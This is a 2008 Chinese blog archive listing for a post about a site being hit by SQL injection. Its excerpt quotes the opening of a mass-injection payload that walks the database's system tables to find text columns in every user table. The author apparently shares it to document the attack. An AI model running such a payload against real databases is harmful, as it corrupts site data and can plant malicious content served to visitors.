05 2008 档案
最近网站接连被攻击 SQL 注入 常用手法
摘要:;declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=23... 阅读全文
posted @ 2008-05-07 16:58 LuckPanda 阅读(736) 评论(2) 推荐(0)